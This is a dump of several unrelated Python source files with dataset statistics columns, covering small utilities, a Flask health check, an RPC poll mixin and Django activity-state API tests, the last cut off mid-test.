] | 2 | 2017-07-15T19:02:02.000Z | 2017-07-26T02:38:21.000Z | src/GameGenerator.py | NowanIlfideme/MafiaEngine | cec0ea28172154d14a2db13f04c22b0b43834755 | [
"Apache-2.0"
] | null | null | null | src/GameGenerator.py | NowanIlfideme/MafiaEngine | cec0ea28172154d14a2db13f04c22b0b43834755 | [
"Apache-2.0"
] | null | null | null | from mafia_engine.base import *
from mafia_engine.entity import *
from mafia_engine.ability import *
from mafia_engine.trigger import *
def generate_game():
ge = GameEngine(
status={'phase':None}
)
pass | 13.764706 | 34 | 0.679487 | 29 | 234 | 5.310345 | 0.586207 | 0.233766 | 0.38961 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.235043 | 234 | 17 | 35 | 13.764706 | 0.860335 | 0 | 0 | 0 | 1 | 0 | 0.021277 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.111111 | 0.444444 | 0 | 0.555556 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
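
# Minimal usage sketch (hypothetical; assumes GameEngine keeps the `status`
# mapping passed above as an attribute):
if __name__ == "__main__":
    engine = generate_game()
    print(engine.status)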
49b62922479ce92fc4986c7924d43425e1d09efa | 319 | py | Python | Chapter 3/Exersises/(3-3) Your Own List.py | 3GamersStudios/SHSPythonWork | 6f98ad3a25d30f2670dc48ca4f9b4cf75eb37a61 | [
"MIT"
] | null | null | null | Chapter 3/Exersises/(3-3) Your Own List.py | 3GamersStudios/SHSPythonWork | 6f98ad3a25d30f2670dc48ca4f9b4cf75eb37a61 | [
"MIT"
] | null | null | null | Chapter 3/Exersises/(3-3) Your Own List.py | 3GamersStudios/SHSPythonWork | 6f98ad3a25d30f2670dc48ca4f9b4cf75eb37a61 | [
"MIT"
] | null | null | null | carsToDrive = ['lamborghini', 'ferrari', 'porsche', 'audi']
print(f"I think it would be cool to drive a {carsToDrive[0]}!")
print(f"I think it would be cool to drive a {carsToDrive[1]}!")
print(f"I think it would be cool to drive a {carsToDrive[2]}!")
print(f"I think it would be cool to drive a {carsToDrive[3]}!") | 35.444444 | 63 | 0.689655 | 57 | 319 | 3.859649 | 0.350877 | 0.109091 | 0.127273 | 0.218182 | 0.8 | 0.8 | 0.8 | 0.8 | 0.8 | 0.8 | 0 | 0.014815 | 0.153605 | 319 | 9 | 64 | 35.444444 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.753125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.8 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
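
# Equivalent loop form of the exercise above (same output with less
# repetition; an addition, not part of the original exercise, which
# practices indexing):
for car in carsToDrive:
    print(f"I think it would be cool to drive a {car}!")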
49d6ca4bd1a3d1ce462daf3c209cc30e2153cc50 | 141 | py | Python | messenger/health_check/health.py | EducationalTestingService/halef-messenger | 59eccdbf021a5a1e8290b4f61fdc2b1d74947993 | [
"Apache-2.0"
] | null | null | null | messenger/health_check/health.py | EducationalTestingService/halef-messenger | 59eccdbf021a5a1e8290b4f61fdc2b1d74947993 | [
"Apache-2.0"
] | 1 | 2017-06-05T22:57:47.000Z | 2017-06-05T22:58:45.000Z | messenger/health_check/health.py | EducationalTestingService/halef-messenger | 59eccdbf021a5a1e8290b4f61fdc2b1d74947993 | [
"Apache-2.0"
] | null | null | null | from flask import jsonify
from . import health_check
@health_check.route("/health_check")
def health_check():
return jsonify(ok=True)
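
# Usage sketch (comment-only, since this module uses a package-relative
# import). It assumes `health_check` in this package's __init__ is a Flask
# Blueprint, which is what the relative import above implies:
#
#     from flask import Flask
#     app = Flask(__name__)
#     app.register_blueprint(health_check)  # exposes GET /health_check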
| 15.666667 | 36 | 0.758865 | 20 | 141 | 5.15 | 0.55 | 0.427184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141844 | 141 | 8 | 37 | 17.625 | 0.85124 | 0 | 0 | 0 | 0 | 0 | 0.092199 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
3f7b9ab258be9ebba989073c04770fd2b72c3330 | 139 | py | Python | torchvision/io/__init__.py | cpuhrsch/vision | bbd363ca2713fb68e1e190206578e600a87baf90 | [
"BSD-3-Clause"
] | 9 | 2019-08-15T15:34:36.000Z | 2022-02-09T15:37:36.000Z | torchvision/io/__init__.py | xploiter-projects/vision | bbd363ca2713fb68e1e190206578e600a87baf90 | [
"BSD-3-Clause"
] | 1 | 2019-09-17T18:23:37.000Z | 2019-09-17T18:23:37.000Z | torchvision/io/__init__.py | xploiter-projects/vision | bbd363ca2713fb68e1e190206578e600a87baf90 | [
"BSD-3-Clause"
] | 9 | 2019-10-29T15:44:10.000Z | 2021-03-30T13:57:18.000Z | from .video import write_video, read_video, read_video_timestamps
__all__ = [
'write_video', 'read_video', 'read_video_timestamps'
]
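
# Usage sketch (an illustration, not part of this __init__): per torchvision
# convention, read_video returns (video_frames, audio_frames, info) and
# read_video_timestamps returns (timestamps, video_fps); "clip.mp4" is a
# placeholder path. Kept as comments so nothing runs on import:
#
#     frames, audio, info = read_video("clip.mp4")
#     stamps, fps = read_video_timestamps("clip.mp4")
#     write_video("copy.mp4", frames, fps=info["video_fps"])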
| 19.857143 | 65 | 0.76259 | 18 | 139 | 5.222222 | 0.388889 | 0.382979 | 0.595745 | 0.404255 | 0.808511 | 0.808511 | 0.808511 | 0 | 0 | 0 | 0 | 0 | 0.136691 | 139 | 6 | 66 | 23.166667 | 0.783333 | 0 | 0 | 0 | 0 | 0 | 0.302158 | 0.151079 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3fa73f95f9795bda1f17130e14b7a1810d7954ed | 81 | py | Python | Python/3-DevOps/week3/basic_pytest/test_basic.py | armirh/Nucamp-SQL-Devops-Training | 6c2dc5793c732bfb4c4d365acbb346a95fbf4bf2 | [
"MIT"
] | 2 | 2022-01-19T02:33:11.000Z | 2022-01-19T02:33:13.000Z | Python/3-DevOps/week3/basic_pytest/test_basic.py | armirh/Nucamp-SQL-Devops-Training | 6c2dc5793c732bfb4c4d365acbb346a95fbf4bf2 | [
"MIT"
] | null | null | null | Python/3-DevOps/week3/basic_pytest/test_basic.py | armirh/Nucamp-SQL-Devops-Training | 6c2dc5793c732bfb4c4d365acbb346a95fbf4bf2 | [
"MIT"
] | null | null | null | def test_simple_pass():
assert True
def test_simple_fail():
assert False | 16.2 | 23 | 0.728395 | 12 | 81 | 4.583333 | 0.666667 | 0.254545 | 0.472727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197531 | 81 | 5 | 24 | 16.2 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.5 | true | 0.25 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
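
# A slightly richer variant using pytest's parametrize marker (added as an
# illustration; one test function covering several cases):
import pytest


@pytest.mark.parametrize("value, expected", [(1 + 1, 2), (2 * 3, 6)])
def test_simple_parametrized(value, expected):
    assert value == expected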
3fbd113249034ea50ea06a1bf3f53fd023c72260 | 45 | py | Python | tests/testlib/testlib_a/main_b.py | bayashi-cl/expander | b3623b656a71801233797e05781295a6101fefd8 | [
"CC0-1.0"
] | null | null | null | tests/testlib/testlib_a/main_b.py | bayashi-cl/expander | b3623b656a71801233797e05781295a6101fefd8 | [
"CC0-1.0"
] | 1 | 2022-03-12T20:41:21.000Z | 2022-03-13T06:34:30.000Z | tests/testlib/testlib_a/main_b.py | bayashi-cl/expander | b3623b656a71801233797e05781295a6101fefd8 | [
"CC0-1.0"
] | null | null | null | def print_name_main_b():
print(__name__)
| 15 | 24 | 0.733333 | 7 | 45 | 3.714286 | 0.714286 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155556 | 45 | 2 | 25 | 22.5 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 1 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
3ff0ca7976419953df17fe8f3ef0d21d912be1d8 | 1,114 | py | Python | gui/communication/rpi.py | a-bombarda/mvm-gui | e00c3fe39cf25c6fb2d2725891610da8885d1d76 | [
"MIT"
] | null | null | null | gui/communication/rpi.py | a-bombarda/mvm-gui | e00c3fe39cf25c6fb2d2725891610da8885d1d76 | [
"MIT"
] | null | null | null | gui/communication/rpi.py | a-bombarda/mvm-gui | e00c3fe39cf25c6fb2d2725891610da8885d1d76 | [
"MIT"
] | null | null | null | """
This module interfaces the GUI with the GPIO.
"""
try:
    import RPi.GPIO as GPIO

    def configure():
        """
        Configures the pins.
        Call this function only once per **program**
        """
        GPIO.setmode(GPIO.BCM)
        GPIO.setup(17, GPIO.OUT)

    def start_alarm_system():
        """
        Raises the LED and buzzer alarm
        """
        GPIO.setmode(GPIO.BCM)
        GPIO.output(17, GPIO.HIGH)

    def stop_alarm_system():
        """
        Lowers the LED and buzzer alarm
        """
        GPIO.setmode(GPIO.BCM)
        GPIO.output(17, GPIO.LOW)

except (ImportError, RuntimeError):
    # Fallbacks for machines without the RPi.GPIO package (development hosts).
    def configure():
        """
        Configures the pins.
        Call this function only once per **program**
        """
        print("rpi.configure - fake function")

    def start_alarm_system():
        """
        Raises the LED and buzzer alarm
        """
        print("rpi.start_alarm_system - fake function")

    def stop_alarm_system():
        """
        Lowers the LED and buzzer alarm
        """
        print("rpi.stop_alarm_system - fake function")
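
# Minimal usage sketch: configure once at startup, then toggle the alarm from
# the GUI layer. Works both on a Pi and, via the fake fallbacks above, on a
# development machine.
if __name__ == "__main__":
    configure()
    start_alarm_system()
    stop_alarm_system()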
| 21.018868 | 54 | 0.551167 | 127 | 1,114 | 4.740157 | 0.338583 | 0.109635 | 0.059801 | 0.099668 | 0.770764 | 0.734219 | 0.734219 | 0.734219 | 0.734219 | 0.734219 | 0 | 0.008152 | 0.339318 | 1,114 | 52 | 55 | 21.423077 | 0.809783 | 0.275583 | 0 | 0.611111 | 0 | 0 | 0.15969 | 0.065116 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.111111 | 0 | 0.444444 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b770792810aff90d4caa86f629414447a678f0ab | 9,317 | py | Python | nerddiary/server/mixins/pollmixin.py | mishamsk/nerddiary | 2d0981c5034460f353c2994347fb95a5c94a55bd | [
"Apache-2.0"
] | null | null | null | nerddiary/server/mixins/pollmixin.py | mishamsk/nerddiary | 2d0981c5034460f353c2994347fb95a5c94a55bd | [
"Apache-2.0"
] | 5 | 2022-02-20T06:10:28.000Z | 2022-03-28T03:22:41.000Z | nerddiary/server/mixins/pollmixin.py | mishamsk/nerddiary | 2d0981c5034460f353c2994347fb95a5c94a55bd | [
"Apache-2.0"
] | null | null | null | from __future__ import annotations
import datetime
from jsonrpcserver import Error, InvalidParams, Result, Success, method
from ...error.error import NerdDiaryError
from ..proto import ServerProtocol
from ..schema import PollExtendedSchema, PollLogsSchema, PollsSchema
class PollMixin:
@method # type:ignore
async def get_polls(self: ServerProtocol, user_id: str) -> Result:
self._logger.debug("Processing RPC call")
try:
ses = await self._sessions.get(user_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
polls = None
try:
polls = await ses.get_polls()
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
polls_ret = []
if polls:
for poll in polls:
polls_ret.append(
PollExtendedSchema(
user_id=user_id, poll_name=poll.poll_name, command=poll.command, description=poll.description
)
)
ret = {
"schema": "PollsSchema",
"data": PollsSchema(polls=polls_ret).dict(exclude_unset=True),
}
self._logger.debug("Success")
return Success(ret)
@method # type:ignore
async def start_poll(self: ServerProtocol, user_id: str, poll_name: str, poll_ts_iso: str | None = None) -> Result:
self._logger.debug("Processing RPC call")
try:
ses = await self._sessions.get(user_id)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
poll_ts = None
if poll_ts_iso:
try:
poll_ts = datetime.datetime.fromisoformat(poll_ts_iso)
except ValueError:
self._logger.exception(f"Error parsing poll_ts_iso: {poll_ts_iso!r}")
return InvalidParams(f"Invalid ISO timestamp: {poll_ts_iso}")
poll_workflow = None
try:
poll_workflow = await ses.start_poll(poll_name, poll_ts=poll_ts)
except NerdDiaryError as err:
self._logger.debug(f"Error: {err!r}")
return Error(err.code, err.message, err.data)
ret = {
"schema": "PollWorkflowStateSchema",
"data": poll_workflow.to_schema().dict(exclude_unset=True),
}
self._logger.debug("Success")
return Success(ret)
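
    # Illustrative request shape for the RPC methods in this mixin (JSON-RPC
    # 2.0, as dispatched by jsonrpcserver). Parameter names mirror the method
    # signatures; the id and values are placeholders:
    #
    #   {"jsonrpc": "2.0", "id": 1, "method": "start_poll",
    #    "params": {"user_id": "user-1", "poll_name": "morning"}}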

    @method  # type:ignore
    async def add_poll_answer(self: ServerProtocol, user_id: str, poll_run_id: str, answer: str) -> Result:
        self._logger.debug("Processing RPC call")

        try:
            ses = await self._sessions.get(user_id)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        poll_workflow = None
        try:
            poll_workflow = await ses.add_poll_answer(poll_run_id=poll_run_id, answer=answer)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        ret = {
            "schema": "PollWorkflowStateSchema",
            "data": poll_workflow.to_schema().dict(exclude_unset=True),
        }
        self._logger.debug("Success")
        return Success(ret)

    @method  # type:ignore
    async def add_default_poll_answer(self: ServerProtocol, user_id: str, poll_run_id: str) -> Result:
        self._logger.debug("Processing RPC call")

        try:
            ses = await self._sessions.get(user_id)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        poll_workflow = None
        try:
            poll_workflow = await ses.add_default_poll_answer(poll_run_id=poll_run_id)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        ret = {
            "schema": "PollWorkflowStateSchema",
            "data": poll_workflow.to_schema().dict(exclude_unset=True),
        }
        self._logger.debug("Success")
        return Success(ret)

    @method  # type:ignore
    async def close_poll(self: ServerProtocol, user_id: str, poll_run_id: str, save: bool) -> Result:
        self._logger.debug("Processing RPC call")

        try:
            ses = await self._sessions.get(user_id)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        try:
            if poll_run_id == "*":
                await ses.close_all_polls(save=save)
            else:
                await ses.close_poll(poll_run_id=poll_run_id, save=save)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        self._logger.debug("Success")
        return Success(True)

    @method  # type:ignore
    async def restart_poll(self: ServerProtocol, user_id: str, poll_run_id: str) -> Result:
        self._logger.debug("Processing RPC call")

        try:
            ses = await self._sessions.get(user_id)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        try:
            poll_workflow = await ses.restart_poll(poll_run_id=poll_run_id)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        ret = {
            "schema": "PollWorkflowStateSchema",
            "data": poll_workflow.to_schema().dict(exclude_unset=True),
        }
        self._logger.debug("Success")
        return Success(ret)

    @method  # type:ignore
    async def get_poll_data(
        self: ServerProtocol,
        user_id: str,
        poll_name: str | None = None,
        count: int | None = None,
        skip: int | None = None,
    ) -> Result:
        self._logger.debug("Processing RPC call")

        try:
            ses = await self._sessions.get(user_id)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        try:
            data = await ses.get_poll_data(poll_name=poll_name, count=count, skip=skip)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        ret = {
            "schema": "PollLogsSchema",
            "data": data.dict(),
        }
        self._logger.debug("Success")
        return Success(ret)

    @method  # type:ignore
    async def get_poll_log(
        self: ServerProtocol,
        user_id: str,
        log_id: int,
    ) -> Result:
        self._logger.debug("Processing RPC call")

        try:
            ses = await self._sessions.get(user_id)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        try:
            poll_workflow = await ses.get_poll_log(log_id=log_id)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        ret = {
            "schema": "PollWorkflowStateSchema",
            "data": poll_workflow.to_schema().dict(exclude_unset=True),
        }
        self._logger.debug("Success")
        return Success(ret)

    @method  # type:ignore
    async def get_poll_worflow(self: ServerProtocol, user_id: str, poll_run_id: str) -> Result:
        self._logger.debug("Processing RPC call")

        try:
            ses = await self._sessions.get(user_id)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        try:
            poll_workflow = await ses.get_poll_worflow(poll_run_id=poll_run_id)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        ret = {
            "schema": "PollWorkflowStateSchema",
            "data": poll_workflow.to_schema().dict(exclude_unset=True),
        }
        self._logger.debug("Success")
        return Success(ret)

    @method  # type:ignore
    async def log_poll_data(self: ServerProtocol, user_id: str, poll_data: str) -> Result:
        self._logger.debug("Processing RPC call")

        try:
            ses = await self._sessions.get(user_id)
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        ret = 0
        try:
            ret = await ses.log_poll_data(data=PollLogsSchema.parse_raw(poll_data))
        except NerdDiaryError as err:
            self._logger.debug(f"Error: {err!r}")
            return Error(err.code, err.message, err.data)

        self._logger.debug("Success")
        return Success(ret)
| 34.635688 | 119 | 0.593324 | 1,122 | 9,317 | 4.744207 | 0.081996 | 0.077024 | 0.112718 | 0.093932 | 0.808379 | 0.794665 | 0.789592 | 0.783393 | 0.746571 | 0.746571 | 0 | 0.000153 | 0.298165 | 9,317 | 268 | 120 | 34.764925 | 0.813886 | 0.012772 | 0 | 0.716216 | 0 | 0 | 0.093828 | 0.015021 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027027 | 0 | 0.171171 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b7d0c342fa70e060db879c2ee8259a144021def8 | 39,000 | py | Python | lrs/tests/ActivityStateTests.py | Sembian/ADL_LRS | 3535dad6371af3f9f5b67f7eabfd0f4a393e0d62 | [
"Apache-2.0"
] | null | null | null | lrs/tests/ActivityStateTests.py | Sembian/ADL_LRS | 3535dad6371af3f9f5b67f7eabfd0f4a393e0d62 | [
"Apache-2.0"
] | null | null | null | lrs/tests/ActivityStateTests.py | Sembian/ADL_LRS | 3535dad6371af3f9f5b67f7eabfd0f4a393e0d62 | [
"Apache-2.0"
] | null | null | null | import hashlib
import urllib
import os
import json
import base64
import ast
import uuid
import datetime
from django.test import TestCase
from django.conf import settings
from django.core.urlresolvers import reverse
from lrs import views
from django.utils.timezone import utc
from django.utils import timezone
class ActivityStateTests(TestCase):
url = reverse(views.activity_state)
testagent = '{"name":"test","mbox":"mailto:test@example.com"}'
otheragent = '{"name":"other","mbox":"mailto:other@example.com"}'
activityId = "http://www.iana.org/domains/example/"
activityId2 = "http://www.google.com"
stateId = "the_state_id"
stateId2 = "state_id_2"
stateId3 = "third_state_id"
stateId4 = "4th.id"
registration = str(uuid.uuid1())
content_type = "application/json"
@classmethod
def setUpClass(cls):
print "\n%s" % __name__
def setUp(self):
self.username = "test"
self.email = "test@example.com"
self.password = "test"
self.auth = "Basic %s" % base64.b64encode("%s:%s" % (self.username, self.password))
form = {'username':self.username,'email': self.email,'password':self.password,'password2':self.password}
self.client.post(reverse(views.register),form, X_Experience_API_Version="1.0.0")
self.testparams1 = {"stateId": self.stateId, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(self.testparams1))
self.teststate1 = {"test":"put activity state 1","obj":{"agent":"test"}}
self.put1 = self.client.put(path, json.dumps(self.teststate1), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.testparams2 = {"stateId": self.stateId2, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(self.testparams2))
self.teststate2 = {"test":"put activity state 2","obj":{"agent":"test"}}
self.put2 = self.client.put(path, json.dumps(self.teststate2), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.testparams3 = {"stateId": self.stateId3, "activityId": self.activityId2, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(self.testparams3))
self.teststate3 = {"test":"put activity state 3","obj":{"agent":"test"}}
self.put3 = self.client.put(path, json.dumps(self.teststate3), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.testparams4 = {"stateId": self.stateId4, "activityId": self.activityId2, "agent": self.otheragent}
path = '%s?%s' % (self.url, urllib.urlencode(self.testparams4))
self.teststate4 = {"test":"put activity state 4","obj":{"agent":"other"}}
self.put4 = self.client.put(path, json.dumps(self.teststate4), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def tearDown(self):
self.client.delete(self.url, self.testparams1, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.client.delete(self.url, self.testparams2, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.client.delete(self.url, self.testparams3, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.client.delete(self.url, self.testparams4, Authorization=self.auth, X_Experience_API_Version="1.0.0")
attach_folder_path = os.path.join(settings.MEDIA_ROOT, "activity_state")
for the_file in os.listdir(attach_folder_path):
file_path = os.path.join(attach_folder_path, the_file)
try:
os.unlink(file_path)
except Exception, e:
raise e
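
    # Illustrative helper (not part of the original suite): the PUT
    # boilerplate that the tests below repeat, factored out. Python 2
    # syntax, matching the rest of this module.
    def _put_state(self, params, doc):
        path = '%s?%s' % (self.url, urllib.urlencode(params))
        return self.client.put(path, json.dumps(doc), content_type=self.content_type,
                               Authorization=self.auth, X_Experience_API_Version="1.0.0")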

    def test_put(self):
        self.assertEqual(self.put1.status_code, 204)
        self.assertEqual(self.put1.content, '')

        self.assertEqual(self.put2.status_code, 204)
        self.assertEqual(self.put2.content, '')

        self.assertEqual(self.put3.status_code, 204)
        self.assertEqual(self.put3.content, '')

        self.assertEqual(self.put4.status_code, 204)
        self.assertEqual(self.put4.content, '')

    def test_put_no_existing_activity(self):
        testparams = {"stateId": self.stateId3, "activityId": "http://foobar", "agent": self.testagent}
        path = '%s?%s' % (self.url, urllib.urlencode(testparams))
        teststate = {"test":"put activity state","obj":{"agent":"test"}}
        put = self.client.put(path, teststate, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
        self.assertEqual(put.status_code, 204)
        self.client.delete(path, Authorization=self.auth, X_Experience_API_Version="1.0.0")

    def test_put_with_registration(self):
        testparamsregid = {"registration": "not-uuid", "stateId": self.stateId, "activityId": self.activityId, "agent": self.testagent}
        path = '%s?%s' % (self.url, urllib.urlencode(testparamsregid))
        teststateregid = {"test":"put activity state w/ registration","obj":{"agent":"test"}}
        put1 = self.client.put(path, teststateregid, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
        self.assertEqual(put1.status_code, 400)

        testparamsregid = {"registration": self.registration, "stateId": self.stateId, "activityId": self.activityId, "agent": self.testagent}
        path = '%s?%s' % (self.url, urllib.urlencode(testparamsregid))
        teststateregid = {"test":"put activity state w/ registration","obj":{"agent":"test"}}
        put1 = self.client.put(path, teststateregid, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
        self.assertEqual(put1.status_code, 204)
        self.assertEqual(put1.content, '')

        # also testing get w/ registration id
        r = self.client.get(self.url, testparamsregid, X_Experience_API_Version="1.0.0", Authorization=self.auth)
        self.assertEqual(r.status_code, 200)
        robj = ast.literal_eval(r.content)
        self.assertEqual(robj['test'], teststateregid['test'])
        self.assertEqual(robj['obj']['agent'], teststateregid['obj']['agent'])
        self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())

        # and tests delete w/ registration id
        del_r = self.client.delete(self.url, testparamsregid, Authorization=self.auth, X_Experience_API_Version="1.0.0")
        self.assertEqual(del_r.status_code, 204)

    def test_put_without_auth(self):
        testparamsregid = {"registration": self.registration, "stateId": self.stateId, "activityId": self.activityId, "agent": self.testagent}
        path = '%s?%s' % (self.url, urllib.urlencode(testparamsregid))
        teststateregid = {"test":"put activity state w/ registration","obj":{"agent":"test"}}
        put1 = self.client.put(path, teststateregid, content_type=self.content_type, X_Experience_API_Version="1.0.0")
        self.assertEqual(put1.status_code, 400)

    def test_put_etag_conflict_if_none_match(self):
        teststateetaginm = {"test":"etag conflict - if none match *","obj":{"agent":"test"}}
        path = '%s?%s' % (self.url, urllib.urlencode(self.testparams1))
        r = self.client.put(path, teststateetaginm, content_type=self.content_type, If_None_Match='*', Authorization=self.auth, X_Experience_API_Version="1.0.0")
        self.assertEqual(r.status_code, 412)
        self.assertEqual(r.content, 'Resource detected')

        r = self.client.get(self.url, self.testparams1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
        self.assertEqual(r.status_code, 200)
        robj = ast.literal_eval(r.content)
        self.assertEqual(robj['test'], self.teststate1['test'])
        self.assertEqual(robj['obj']['agent'], self.teststate1['obj']['agent'])
        self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())

    def test_put_etag_conflict_if_match(self):
        teststateetagim = {"test":"etag conflict - if match wrong hash","obj":{"agent":"test"}}
        new_etag = '"%s"' % hashlib.sha1('wrong etag value').hexdigest()
        path = '%s?%s' % (self.url, urllib.urlencode(self.testparams1))
        r = self.client.put(path, teststateetagim, content_type=self.content_type, If_Match=new_etag, Authorization=self.auth, X_Experience_API_Version="1.0.0")
        self.assertEqual(r.status_code, 412)
        self.assertIn('No resources matched', r.content)

        r = self.client.get(self.url, self.testparams1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
        self.assertEqual(r.status_code, 200)
        robj = ast.literal_eval(r.content)
        self.assertEqual(robj['test'], self.teststate1['test'])
        self.assertEqual(robj['obj']['agent'], self.teststate1['obj']['agent'])
        self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())

    def test_put_etag_no_conflict_if_match(self):
        teststateetagim = {"test":"etag no conflict - if match good hash","obj":{"agent":"test"}}
        new_etag = '"%s"' % hashlib.sha1(json.dumps(self.teststate1)).hexdigest()
        path = '%s?%s' % (self.url, urllib.urlencode(self.testparams1))
        r = self.client.put(path, teststateetagim, content_type=self.content_type, If_Match=new_etag, Authorization=self.auth, X_Experience_API_Version="1.0.0")
        self.assertEqual(r.status_code, 204)
        self.assertEqual(r.content, '')

        r = self.client.get(self.url, self.testparams1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
        self.assertEqual(r.status_code, 200)
        robj = ast.literal_eval(r.content)
